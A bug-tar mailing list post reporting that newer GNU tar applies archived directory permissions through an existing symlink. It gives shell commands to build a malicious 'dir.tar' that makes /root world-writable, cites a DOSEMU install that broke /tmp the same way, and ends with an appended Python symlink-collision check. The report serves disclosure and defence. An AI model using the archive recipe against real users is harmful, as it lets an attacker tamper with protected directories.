Hi, I just discovered that tar 1.14 enabled the opposite of "--no-overwrite-dir" by default. This is an unexpected and subtle change in behavior.
Users of tar who are unaware of this change are subject to the following exploit: The hacker constructs "dir.tar" and sends it to the unsuspecting user.

~~~~
# mkdir dir
# >dir/YOU_HAVE_BEEN_HACKED.txt
# chmod a+rwx dir
# tar cf dir.tar dir
# rm -rf dir
~~~~

The user happens to have a symlink called "dir" in the current directory and untars "dir.tar":

~~~~
# tar --version
tar (GNU tar) 1.15.1
# ls -ld /root
drwx------ 25 root root 1784 Sep 3 23:00 /root
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory
# ln -s /root dir    # (simulate already existing symlink)
# tar xf dir.tar
# ls -ld /root
drwxrwxrwx 25 root root 1824 Sep 3 23:02 /root
# ls -l /root/*.txt
-rw-r--r-- 1 root root 0 Sep 3 23:02 /root/YOU_HAVE_BEEN_HACKED.txt
# ls -ld dir
lrwxrwxrwx 1 root root 5 Sep 3 23:06 dir -> /root
~~~~

An older version of tar gives the expected - and safer - behaviour:

~~~~
# tar --version
tar (GNU tar) 1.13.25
[...]
# ls -ld /root
drwx------ 25 root root 1784 Sep 3 23:00 /root
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory
# ln -s /root dir    # (simulate already existing symlink)
# tar xf dir.tar
# ls -ld /root
drwx------ 21 root root 2144 Sep 3 22:35 /root/
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory
# ls -ld dir
drwxrwxrwx 2 root root 88 Sep 3 23:02 dir/
~~~~

In-the-wild "exploit": Typing "make install" as root for the second time with DOSEMU 1.3.2 or CVS source (prior to a few minutes ago) will change the permissions of "/tmp" from "rwxrwxrwt" to "rwxr-xr-x", creating a DoS for non-root users.

https://sourceforge.net/tracker/?func=detail&atid=457447&aid=1224934&group_id=49784

The reason for this is that at "make install" time, a symbolic link "/usr/local/share/dosemu/freedos/tmp" is made to point to "/tmp". On the second invocation of "make install", dosemu-freedos-bin.tgz is unpacked to "/usr/local/share" - however it contains a directory "dosemu/freedos/tmp" with permissions "rwxr-xr-x".
Suggested fix: Revert relevant behaviour to tar 1.13.25. As DOSEMU has shown, it is too dangerous to change this kind of behaviour and expect users to realise that such a change has occurred. Imagine changing "rm -i" to delete files without prompting!

Clarence

[please CC me on replies]

_______________________________________________
Bug-tar mailing list
[email protected]
http://lists.gnu.org/mailman/listinfo/bug-tar
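The hazard described in the post is that a directory entry in an archive lands on a pre-existing symlink in the extraction directory, so the archived permissions get applied to the symlink's target. The following is an added example, not code from the post or from GNU tar: a pre-extraction check, written with Python's standard tarfile module, that walks every directory path an archive would traverse and reports the ones that already exist in the destination as symlinks. The archive it inspects is constructed inline to mirror the "dir.tar" in the post (a mode 0777 directory holding one empty file), and the destination with a pre-existing "dir" symlink is a temporary directory standing in for the user's home. Function names (symlink_collisions, safe_extract, demo) are this example's own.

```python
import io
import os
import tarfile
import tempfile


def build_demo_archive() -> bytes:
    """Constructed sample archive shaped like the post's dir.tar:
    a world-writable directory 'dir' containing one empty file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        d = tarfile.TarInfo("dir")
        d.type = tarfile.DIRTYPE
        d.mode = 0o777                      # the permissions that get applied on extraction
        tar.addfile(d)
        f = tarfile.TarInfo("dir/YOU_HAVE_BEEN_HACKED.txt")
        f.type = tarfile.REGTYPE
        f.size = 0
        f.mode = 0o644
        tar.addfile(f, io.BytesIO(b""))
    return buf.getvalue()


def symlink_collisions(archive: bytes, dest: str) -> list:
    """Return (member_path, resolved_target) for every directory path the
    archive would traverse under dest that already exists there as a symlink.
    A tar that applies archived directory metadata to existing directories
    would, through such a symlink, change the target's mode instead."""
    hits = []
    seen = set()
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for m in tar.getmembers():
            parts = m.name.strip("/").split("/")
            # every leading component is a directory extraction must pass through;
            # for a directory member the full path counts too
            prefixes = parts if m.isdir() else parts[:-1]
            for i in range(1, len(prefixes) + 1):
                rel = "/".join(prefixes[:i])
                if rel in seen:
                    continue
                seen.add(rel)
                candidate = os.path.join(dest, rel)
                if os.path.islink(candidate):
                    hits.append((rel, os.path.realpath(candidate)))
    return hits


def safe_extract(archive: bytes, dest: str) -> bool:
    """Extract only when no archived directory collides with a symlink in dest.
    Returns True when extraction ran, False when it was refused."""
    if symlink_collisions(archive, dest):
        return False
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        tar.extractall(dest)
    return True


def demo() -> dict:
    """Recreate the post's scenario in a scratch directory: 'dir' in the
    extraction directory is a symlink to a mode 0700 directory (standing in
    for /root). Returns what the check found and whether extraction was refused."""
    archive = build_demo_archive()
    with tempfile.TemporaryDirectory() as work:
        target = os.path.join(work, "victim_home")   # plays the role of /root
        os.mkdir(target)
        os.chmod(target, 0o700)
        dest = os.path.join(work, "cwd")
        os.mkdir(dest)
        os.symlink(target, os.path.join(dest, "dir"))  # the pre-existing symlink
        hits = symlink_collisions(archive, dest)
        extracted = safe_extract(archive, dest)
        mode_after = os.stat(target).st_mode & 0o777

        # control case: 'dir' is a real directory, so nothing should be flagged
        clean = os.path.join(work, "clean")
        os.mkdir(clean)
        os.mkdir(os.path.join(clean, "dir"))
        clean_hits = symlink_collisions(archive, clean)

    return {"hits": hits, "extracted": extracted,
            "target_mode": mode_after, "clean_hits": clean_hits}


if __name__ == "__main__":
    print(demo())
```

With GNU tar itself the equivalent precaution is to pass --no-overwrite-dir when extracting archives of unknown origin into a directory that may already contain symlinks; the check above is useful where extraction is done from a script that cannot rely on which tar version is installed.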
